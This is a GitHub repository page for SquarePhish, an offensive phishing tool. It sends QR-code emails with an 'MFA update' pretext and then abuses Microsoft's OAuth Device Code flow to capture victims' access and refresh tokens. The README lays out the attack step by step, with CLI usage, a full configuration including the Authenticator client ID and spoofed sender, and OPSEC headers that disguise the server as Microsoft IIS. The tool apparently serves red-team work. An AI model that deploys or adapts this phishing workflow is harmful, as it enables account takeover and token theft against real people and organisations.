• Stars
    star
    272
  • Rank 151,235 (Top 3 %)
  • Language
    Python
  • License
    Apache License 2.0
  • Created over 2 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

SquarePhish

SquarePhish is an advanced phishing tool that uses a technique combining the OAuth Device code authentication flow and QR codes.

See PhishInSuits for more details on using OAuth Device Code flow for phishing attacks.


   _____                            _____  _     _     _     
  / ____|                          |  __ \| |   (_)   | |    
 | (___   __ _ _   _  __ _ _ __ ___| |__) | |__  _ ___| |__  
  \___ \ / _` | | | |/ _` | '__/ _ \  ___/| '_ \| / __| '_ \ 
  ____) | (_| | |_| | (_| | | |  __/ |    | | | | \__ \ | | |
 |_____/ \__, |\__,_|\__,_|_|  \___|_|    |_| |_|_|___/_| |_|
            | |                                              
            |_|                                            
                     _________
                    |         | /(
                    | O       |/ (
                    |>        |\ (  v0.1.0
                    |_________| \(

usage: squish.py [-h] {email,server} ...

SquarePhish -- v0.1.0

optional arguments:
  -h, --help      show this help message and exit

modules:
  {email,server}
    email         send a malicious QR Code email to a provided victim
    server        host a malicious server QR Codes generated via the 'email' module will 
                  point to that will activate the malicious OAuth Device Code flow

Attack Steps

An attacker can use the email module of SquarePhish to send a malicious QR code email to a victim. The default pretext is that the victim is required to update their Microsoft MFA authentication to continue using mobile email. The current client ID in use is the Microsoft Authenticator App.

By sending a QR code first, the attacker can avoid prematurely starting the OAuth Device Code flow that lasts only 15 minutes.

The victim will then scan the QR code found in the email body with their mobile device. The QR code will direct the victim to the attacker controlled server (running the server module of SquarePhish), with a URL paramater set to their email address.

When the victim visits the malicious SquarePhish server, a background process is triggered that will start the OAuth Device Code authentication flow and email the victim a generated Device Code they are then required to enter into the legitimate Microsoft Device Code website (this will start the OAuth Device Code flow 15 minute timer).

The SquarePhish server will then continue to poll for authentication in the background.

[2022-04-08 14:31:51,962] [info] [[email protected]] Polling for user authentication...
[2022-04-08 14:31:57,185] [info] [[email protected]] Polling for user authentication...
[2022-04-08 14:32:02,372] [info] [[email protected]] Polling for user authentication...
[2022-04-08 14:32:07,516] [info] [[email protected]] Polling for user authentication...
[2022-04-08 14:32:12,847] [info] [[email protected]] Polling for user authentication...
[2022-04-08 14:32:17,993] [info] [[email protected]] Polling for user authentication...
[2022-04-08 14:32:23,169] [info] [[email protected]] Polling for user authentication...
[2022-04-08 14:32:28,492] [info] [[email protected]] Polling for user authentication...

The victim will then visit the Microsoft Device Code authentication site from either the link provided in the email or via a redirect from visiting the SquarePhish URL on their mobile device.

The victim will then enter the provided Device Code and will be prompted for consent.

After the victim authenticates and consents, an authentication token is saved locally and will provide the attacker access via the defined scope of the requesting application.

[2022-04-08 14:32:28,796] [info] [[email protected]] Token info saved to [email protected]

The current scope definition:

"scope": ".default offline_access profile openid"

Usage

!IMPORTANT: Before using either module, update the required information in the settings.config file noted with Required.

Email Module

Send the target victim a generated QR code that will trigger the OAuth Device Code flow.

usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

  -e EMAIL, --email EMAIL
                        victim email address to send initial QR code email to

  -u URL, --url URL     force a url to use, this will override the default
                        and will not work with default device flow or
                        pretext but can be useful if using squarephish to
                        send lures directing targets to other servers

Server Module

Host a server that a generated QR code will be pointed to and when requested will trigger the OAuth Device Code flow.

usage: squish.py server [-h] [-c CONFIG] [--debug]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

Configuration

All of the applicable settings for execution can be found and modified via the settings.config file. There are several pieces of required information that do not have a default value that must be filled out by the user: SMTP_EMAIL, SMTP_PASSWORD, and SQUAREPHISH_SERVER (only when executing the email module). All configuration options have been documented within the settings file via in-line comments.

Note: The SQUAREPHISH_ values present in the 'EMAIL' section of the configuration should match the values set when running the SquarePhish server.

[DEFAULT]
SMTP_PORT            = 465                                                                      # SMTP port, defaulted to 465
SMTP_SERVER          = "smtp.gmail.com"                                                         # SMTP server, defaulted to GMail
SMTP_PROTO           = "ssl"                                                                    # SMTP protocol: {ssl, tls, None (leave empty)}
SMTP_EMAIL           = ""                                                                       # Provide authenticating email address here
SMTP_PASSWORD        = ""                                                                       # Provide authenticating password here

[EMAIL]
SQUAREPHISH_SERVER   = ""                                                                       # Required: Provide IP address/domain name of hosted SquarePhish server
SQUAREPHISH_PORT     = 8443                                                                     # Hosted SquarePhish server port, defaulted to 8443 (this should match the below server value)
SQUAREPHISH_ENDPOINT = "/mfa"                                                                   # Hosted SquarePhish endpoint to trigger OAuth Device Code flow, defaulted to an MFA pretext (this should match the below server value)
FROM_EMAIL           = "[email protected]"                                                     # Default FROM address when sending an email
SUBJECT              = "ACTION REQUIRED: Multi-Factor Authentication (MFA) Update"              # Default SUBJECT when sending an email, defauled to an MFA pretext
EMAIL_TEMPLATE       = "pretexts/mfa/qrcode_email.html"                                         # Email body template for QR code email to victim

[SERVER]
PORT                 = 8443
FROM_EMAIL           = "[email protected]"                                                     # Default FROM address when sending an email
SUBJECT              = "ACTION REQUIRED: Multi-Factor Authentication (MFA) Update"              # Default SUBJECT when sending an email, defauled to an MFA pretext
CLIENT_ID            = "4813382a-8fa7-425e-ab75-3b753aab3abb"                                   # Authenticating client ID, defaulted to Microsoft Authenticator App
ENDPOINT             = "/mfa"                                                                   # Hosted endpoint to trigger OAuth Device Code flow, defaulted to an MFA pretext
CERT_CRT             = ""                                                                       # Server SSL certificate .crt file
CERT_KEY             = ""                                                                       # Server SSL certificate .key file
EMAIL_TEMPLATE       = "pretexts/mfa/devicecode_email.html"                                     # Email body template for device code email to victim
PERMISSION_SCOPE     = ".default offline_access profile openid"                                 # OAuth permission scope - https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-permissions-and-consent

Custom Pretexts

Currently, the pre-defined pretexts can be found in the pretexts folder.

To write custom pretexts, use the existing template via the pretexts/iphone/ folder. An email template is required for both the initial QR code email as well as the follow up device code email.

Important: When writing a custom pretext, note the existence of %s in both pretext templates. This exists to allow SquarePhish to populate the correct data when generating emails (QR code data and/or device code value).

OPSEC

There are several HTTP response headers defined in the utils.py file. These headers are defined to override any existing Flask response header values and to provide a more 'legitimate' response from the server. These header values can be modified, removed and/or additional headers can be included for better OPSEC.

{
    "vary": "Accept-Encoding",
    "server": "Microsoft-IIS/10.0",
    "tls_version": "tls1.3",
    "content-type": "text/html; charset=utf-8",
    "x-appversion": "1.0.8125.42964",
    "x-frame-options": "SAMEORIGIN",
    "x-ua-compatible": "IE=Edge;chrome=1",
    "x-xss-protection": "1; mode=block",
    "x-content-type-options": "nosniff",
    "strict-transport-security": "max-age=31536000",
}

More Repositories

1

dcept

A tool for deploying and detecting use of Active Directory honeytokens
Python
498
star
2

dalton

Suricata and Snort IDS rule and pcap testing system
Python
431
star
3

flowsynth

a network packet capture compiler
Python
190
star
4

family-of-client-ids-research

Research into Undocumented Behavior of Azure AD Refresh Tokens
Python
190
star
5

TokenMan

Python
99
star
6

PhishInSuits

Python
98
star
7

chaosbernie

Azure as an external process source for psDoom-ng
Go
85
star
8

whiskeysamlandfriends

GoldenSAML Attack Libraries and Framework
Python
63
star
9

pdfxpose

A security tool for detecting suspicious PDF modifications commonly found in BEC
Python
40
star
10

aristotle

Python
33
star
11

BAADTokenBroker

PowerShell
19
star
12

taegis-sdk-python

Python
14
star
13

atomic-harness

A tool to run and validate telemetry for Atomic Red Team tests
Go
14
star
14

primary-refresh-token-viewer

Java
11
star
15

PTAAgentDump

C#
10
star
16

taegis-threat-hunting-tutorials

Threat Hunting with Jupyter Notebooks on Taegis
Jupyter Notebook
9
star
17

infosec-jupyterthon-2022-ipython-magics

Jupyter Notebook
9
star
18

taegis-magic

Taegis Magic is a Jupyter Notebook and Command Line Interface for interacting with the Secureworks Taegisโ„ข security platform. The Magics project is intended to assist users with workflows and analysis through Jupyter Notebook integrations and Pandas DataFrames.
Python
8
star
19

moonshine

C++
7
star
20

log4j-analysis

7
star
21

taegis-sdk-go

Go
6
star
22

Cloudy-Loot

Cloudy Loot is a tool to look for cloud tools, configuration files, keys, and secrets.
Python
5
star
23

logger

A unified logging interface for Golang that supports multiple libraries.
Go
5
star
24

BETTER

5
star
25

knife-infoblox

A pluging for the chef.io knife command for manipulating infoblox endpoints
Ruby
5
star
26

responder_ginx

Shell
5
star
27

adfs-cli

Tools for creating and managing AWS Tokens via ADFS/SAML
Python
4
star
28

term-player

JavaScript
4
star
29

atomic-validation-criteria

4
star
30

supermarket-mirror

Shell
3
star
31

GraphQL-GUI

Makefile
3
star
32

AlertSite2Wavefront

Python script that sends Alertsite monitoring results to Wavefront.
Python
3
star
33

ukraine-crisis

2
star
34

telemetry-tool-example

Go
2
star
35

Yara-Elixir

Proof-of-concept NIF implementation of Yara from Elixir.
C
2
star
36

azure_auth

Python
1
star
37

chef-satellite6

Satellite 6 wrapper cookbook
Ruby
1
star
38

chef-qas

Chef cookbook for Dell Quest Authentication Services.
Ruby
1
star
39

errors

A golang errors package
Go
1
star